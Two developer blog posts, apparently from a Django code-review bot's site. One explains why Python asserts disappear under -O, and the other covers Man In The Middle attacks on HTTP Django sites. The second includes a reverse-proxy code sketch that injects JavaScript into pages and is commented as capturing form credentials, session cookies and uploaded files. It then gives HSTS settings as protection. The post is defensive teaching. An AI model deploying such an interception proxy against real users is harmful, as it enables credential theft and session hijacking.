You might be using assert wrong

Assert is often used in production code as a form of data validation check or sanity testing. You may have seen code bases that contain logic like:

def validate_age(value):
    assert value < 70, "No youngsters allowed!"  
response = requests.post(url=url, json={'foo': 'bar'})
assert response.ok, response.text

However, assertions should only be used for testing, development, and debugging purposes. assert is not meant to be used in production code. Don’t take my word for it. The Python docs for assert state:

Assert statements are a convenient way to insert debugging assertions into a program

https://docs.python.org/3/reference/simple_stmts.html#the-assert-statement

Optimized out

We can trigger an AssertionError in the shell:

python -c 'assert 80 < 70, "No youngsters allowed!"'
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AssertionError: No youngsters allowed!

However, given Python provides assert as a debugging tool, Python also provides a way to remove the assertions from the compiled byte code by specifying -O:

python -O -c 'assert 80 < 70, "No youngsters allowed!"'

No AssertionError is raised! The same behavior can be triggered via PYTHONOPTIMIZE environment variable. Both the PYTHONOPTIMIZE and -O command line switch have the same outcome:

PYTHONOPTIMIZE=1 python -c 'assert 80 < 70, "No youngsters allowed!"'

Again, no AssertionError is raised. As per the docs, both -O flag and PYTHONOPTIMIZE have this effect:

Remove assert statements and any code conditional on the value of __debug__. Augment the filename for compiled (bytecode) files by adding .opt-1 before the .pyc extension (see PEP 488). See also PYTHONOPTIMIZE.

https://docs.python.org/3/using/cmdline.html#cmdoption-o

The bytecode “intermediate language” between Python and C: Python source code is compiled into bytecode, the internal representation of a Python program in the CPython interpreter. With this knowledge, we can view the compiled byte code of optimized and non-optimized:

python3 -c 'import dis; dis.dis("assert 80 < 70")'
  1           0 LOAD_CONST               0 (80)
              2 LOAD_CONST               1 (70)
              4 COMPARE_OP               0 (<)
              6 POP_JUMP_IF_TRUE         6 (to 12)
              8 LOAD_ASSERTION_ERROR
             10 RAISE_VARARGS            1
        >>   12 LOAD_CONST               2 (None)
             14 RETURN_VALUE

python3 -O -c 'import dis; dis.dis("assert 80 < 70")'
  1           0 LOAD_CONST               0 (None)
              2 RETURN_VALUE
PYTHONOPTIMIZE=1 python3 -c 'import dis; dis.dis("assert 80 < 70")'
  1           0 LOAD_CONST               0 (None)
              2 RETURN_VALUE

We see in optimized mode Python does not just skip the assertions, they are literally removed. Therefore asserts are not for data validation, and are not for control flow because they are one flag or environment variable away from being automatically removed from the application.

If pytest is ran with PYTHONOPTIMIZE=1 you will get a helpful warning that assertions not in tests or plugins will be ignored. A helpful warning suggesting they too see assertions abused.

Correct usage of assert

Asserts should not be used for things like handling user input or checking for network errors since these can and do occur during normal execution.

Most developers misuse assert statements by using them for general error handling. This is not what assert statements are for. Assert statements are meant to check assumptions that your code makes which needs to be communicated to other developers that are reading the code. For example, you might use an assert statement to check that a parameter is not None before using it. If the parameter is None, the assert statement will throw an error, alerting you that your code has a problem.

Assert statements should only be used for conditions that should NEVER be false. This is because assert statements are used to test for conditions that are expected to be accurate, and if they are wrong, it indicates a bug in the program. By only using assert statements for conditions that should NEVER be false, we can be sure that any failure in the assert statement indicates a real problem with the program.

This is useful for testing as it allows you to check that your code is working as expected.

Debugging and Testing

The assert keyword is used to check for bugs in your code when debugging. Using assert, you can manually test your code to see if it works properly by checking for the AssertionError. If an assert statement fails, it will stop your program from running. This can be very useful for debugging your code.

Unit tests provide a more comprehensive way to test code and libraries like Pytest expect assert to be used in the test.

Improve your code

Code Review Doctor suggests Python and Django fixes right inside the pull requests:

You can check your GitHub or Bitbucket Pull Requests, scan your entire codebase for free online.

Follow us on Twitter.

Hacking Django websites: Man In The Middle attack

A website served via HTTP is vulnerable to Man In The Middle (MITM) attacks: a hacker can get between your browser and the server responding to the browser’s requests. The response or request can be amended for malicious intent. A Man could get In The Middle after an unsuspecting user connects to a nefarious network e.g. when joining a cafe’s wifi or after a cheeky connection to a neighbor’s unprotected network: these may be honey traps.

Concretely one way to achieve this is by creating a reverse proxy. Here’s an example of a MITM adding some Javascript to the response:

import revproxy.views
from bs4 import BeautifulSoup

from django.http import HttpResponse

# after 2 seconds change some content
javascript = BeautifulSoup(
    """<script>
        setTimeout(function() {
            document.querySelectorAll("h1")[0].innerText = "HACKED!" 
        },
     2000
)
</script>""",
'html.parser')

class ProxyView(revproxy.views.ProxyView):

    def dispatch(self, request, *args, **kwargs):
        # user may be logging in, so save the form data so to maybe steal their username and password
        save_form_data(request.GET or request.POST)

        # cookies may contain session cookie, so save it to later maybe do session hijacking
        save_cookies(request.COOKIES)

        # user may be doing something embarrassing, so save the url to maybe blackmail them
        save_url(request.get_full_path())

        # user may be uploading some embarrassing pictures of documents. more blackmail
        save_files(request.FILES)

        response = super().dispatch(request=request, path=request.get_full_path(), *args, **kwargs)

        if 'text/html' in response.get('content-type'):
            # now inject nefarious JavaScript
            soup = BeautifulSoup(response.content, 'html.parser')

            soup.head.append(javascript)
            response = HttpResponse(str(soup))
        return response

And this is the outcome:

Protection

This can be avoided by serving exclusively on HTTPS as the content will no longer be in plain text for the MITM to read and mutate. Django supports this via SECURE_SSL_REDIRECT – so Django will redirect any HTTP request to HTTPS. However, this is an incomplete solution:

  • a MITM could intercepts the “redirect to HTTPS” response and change it.
  • a MITM could upgrade your HTTP request to HTTPS: the user has a HTTP request that terminates at the MITM and the MITM upgrades the request to HTTPS: data would be plainly readable by the bad actor.

There is a solution to that in HTTP Strict Transport Security protection: the browser blocks HTTP requests to your website and instead use HTTPS.

Django facilitates that via the SECURE_HSTS_SECONDS setting. When first setting the value it’s worth using a small value like 3600 (1 hour) to check it works as expected, as once the browser sees the HSTS header it will respect it until the specified time is met, meaning if your website has misconfigured HTTPS certificates then you cannot rollback to HTTP while you fix it.

It’s also advisable to set SECURE_HSTS_INCLUDE_SUBDOMAINS so the browser uses HTST for all subdomains and not just the current one. It would be a shame to protect http://example.com but not http://www.example.com.

So concretely the following change will help protect your Django website against Man In The Middle attacks:

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    ...
]

SECURE_HSTS_SECONDS = 3600
SECURE_HSTS_INCLUDE_SUBDOMAINS = True

Note that SECURE_HSTS_ settings required django.middleware.security.SecurityMiddleware to be present in MIDDLEWARE otherwise they will do nothing.

Does your website have security vulnerabilities?

Over time it’s easy for security vulnerabilities and tech debt to slip into your codebase. I can check for Man In The Middle vulnerability and many others for for free you at django.doctor. I’m a Django code improvement bot:

If you would prefer security holes not make it into your codebase, I also review pull requests:

Part 2: CSRF

part 3: Clickjacking